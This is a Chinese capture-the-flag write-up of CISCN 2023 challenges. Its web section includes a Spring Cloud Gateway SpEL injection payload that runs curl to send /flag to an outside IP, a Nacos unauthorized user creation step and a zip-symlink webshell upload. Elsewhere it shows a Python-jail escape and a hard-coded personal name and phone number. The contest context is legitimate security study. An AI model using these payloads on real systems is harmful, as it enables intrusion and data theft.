2023CISCN部分wp
re
mov不想写了
ezbyte
dwarf字节码执行
直接readelf -Wwf读取字节码
得到
最后让r12返回值为0
即四个表达式分别成立
所以
import re
print(hex((0^1237891274917891239^2616514329260088143)-1892739))
print(hex((0^1209847170981118947^8502251781212277489)-8971237))
print(hex((0^1098791727398412397^2451795628338718684)-1512312))
print(hex((0^1890878197237214971^8722213363631027234)-9123704))
然后大小端转换 hex转字符
再加上elf文件中检测flag部分的最后四位即为flag
bytere
直接问AI
https://snap.berkeley.edu/snap/snap.html
在线运行
一个简单xor
手动输入enc
key=[10,102,13,6,28,74,3,1,3,7,85,0,4,75,20,92,92,8,28,25,81,83,7,28,76,88,9,0,29,73,0,86,4,87,87,82,84,85,4,85,87,30]
for i in range(1,len(key)-1):
key[i] = key[i] ^ key[i-1]
print(key)
for x in key:
print(chr(x),end="")
misc
国粹
拿a,k两张图片中麻将的位置当作x,y
写脚本
使用cv2匹配相似度
import cv2
import matplotlib.pyplot as plt
import numpy as np
section_size = (53, 73)
lookup_table = []
first_image = cv2.imread("1.png")
for i in range(0, first_image.shape[1], section_size[0]):
section = first_image[:, i:i + section_size[0], :]
lookup_table.append(section)
a = cv2.imread("a.png")
k = cv2.imread("k.png")
for i in range(0, a.shape[1], section_size[0]):
section_1 = a[:, i:i + section_size[0], :]
section_2 = k[:, i:i + section_size[0], :]
match_scores = []
for template in lookup_table:
match_scores.append(cv2.matchTemplate(section_1, template, cv2.TM_CCOEFF_NORMED))
x_coord = np.argmax(match_scores)
match_scores = []
for template in lookup_table:
match_scores.append(cv2.matchTemplate(section_2, template, cv2.TM_CCOEFF_NORMED))
y_coord = np.argmax(match_scores)
plt.scatter(y_coord, -x_coord, color='red')
plt.show()
pyshell
fuzz一下发现长度能大于7,并且直接去掉等号,包括'='输入也不行
发现有exec和eval函数
但是exec()就是六位,所以考虑用一个变量存储字符串
搜索得到
所以
""
_+'i'
_+'m'
可以将im存在_变量中
以此类推 导入os并执行os.system("cat /flag")
Crypto
基于国密SM2算法的密钥密
按照文档打即可
记得是新国密,gmssl库中应该指定mode=1
import pprint
import requests
from gmssl import sm2
url = "http://123.56.135.185:18573"
data = {
"school": "成都理工大学",
"name": "闫梓宇",
"phone": "18832322189"
}
response = requests.post(url + "/api/login", json=data)
if response.status_code == 200:
# print(response.json())
print("Login successful!")
else:
print("Login failed.")
id = response.json()['data']['id']
# 16进制的公钥和私钥
A_Private_Key = "75196FA0418ED0BB6722D7491224AF0AF9689C7492098F4BDF6D2A72DAD5F9C9"
A_Public_Key = 'F8D9A40C5D2AA0A436CE38D4935A1BE8AE656474F2C5A6C5A929670DA36C798B078E18B8D3E980C9D686608981FC8AD6DE02F1AEE19E7EEB322757C2E1D2CC8E'
# 上传公钥
data = {
"id": id,
"publicKey": A_Public_Key}
response = requests.post(url + "/api/allkey", json=data)
if response.status_code == 200:
print("Send successful!")
else:
print("Send failed.")
print(response.json())
sm2_crypt = sm2.CryptSM2(
public_key=A_Public_Key, private_key=A_Private_Key, mode=1)
B_Public_Key = response.json()['data']['publicKey']
B_Private_Key_C = response.json()['data']['privateKey']
C_C = response.json()['data']['randomString']
print(C_C, "!!!!!!!")
C_C = bytes.fromhex(C_C)
C = sm2_crypt.decrypt(C_C)
print(C.hex())
print("B_Private_Key_C", B_Private_Key_C)
print("Bpublic", B_Public_Key)
print("randomSTR", C.hex())
assert len(C) == 16
from gmssl.sm4 import CryptSM4, SM4_DECRYPT
crypt_sm4 = CryptSM4()
crypt_sm4.set_key(C, SM4_DECRYPT)
B_Private_Key = crypt_sm4.crypt_ecb(bytes.fromhex(B_Private_Key_C))
assert len(B_Private_Key) == 32
B_Private_Key = B_Private_Key.hex().upper()
print("PRIVATEKEY", B_Private_Key)
sm2_crypt = sm2.CryptSM2(
public_key=B_Public_Key, private_key=B_Private_Key, mode=1)
data = {
"id": id
}
response = requests.post(url + "/api/quantum", json=data, timeout=10)
quantumString = response.json()['data']['quantumString']
quantumString = bytes.fromhex(quantumString)
res = sm2_crypt.decrypt(quantumString)
print(res)
assert len(res) == 16
data = {
"id": id,
"quantumString": res.hex().upper()
}
print(data)
response = requests.post(url + "/api/check", json=data)
print(response.json())
data = {
"id": id,
}
response = requests.post(url + "/api/search", json=data)
pprint.pprint(response.json())
可信度量
非预期了
grep -r "flag{" / 2>/dev/null
然后cat即可
Sign_in_passwd
一个是url编码后的base64码表
一个是密文
直接在线网站解密即可
web
unzip
当解压操作可以覆盖上一次解压文件就可以造成任意文件上传漏洞
源码只判断了是不是zip,然后就解压,当名字一样的时候可以覆盖之前上传的文件
参考https://forum.butian.net/share/906的zipzip
先构造一个软链接指向/var/www/html
此时test.zip解压出来的文件是软链接指向/var/www/html
接下来我们构造一个test目录(因为前面软链接的名字叫做test),我们在test目录下放一个webshell,然后打包这个目录
那我们上传上去的test1.zip解压后就变成了test/shell.php,因为此时在目标机器上test是软链接指向了/var/www/html,所以我们的shell.php就上传到了/var/www/html中,访问getshell
被加密的生产流量
直接wireshark打开,追踪modbus数据流
MMYWMX3GNEYWOXZRGAYDA===
Base32解码,拿到flag
dumpit
首页给了几个传参形式,发现可以直接dump数据表
开始以为是注入,写文件,但是dump的话,应该是执行的是命令,可以换行注入,但是flag没有在/下,在env下
BackendService
先打未授权添加用户
POST /nacos/v1/auth/users
username=demo&password=demo
然后看到包内配置了spring_cloud_gateway,之前在先知上看到了这个文章的
配置一个叫backcfg的data id
{
"spring": {
"cloud": {
"gateway": {
"routes": [
{
"id": "exam",
"order": 0,
"uri": "lb://backendservice",
"predicates": [
"Path=/echo/**"
],
"filters": [
{
"name": "AddResponseHeader",
"args": {
"name": "result",
"value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{'curl','http://47.93.248.221:2333','-T','/flag'}).getInputStream())).replaceAll('\n','').replaceAll('\r','')}"
}
}
]
}
]
}
}
}
}
然后访问了/echo/123(不知道需不需要这步,我有时候能打出来,有时候不行)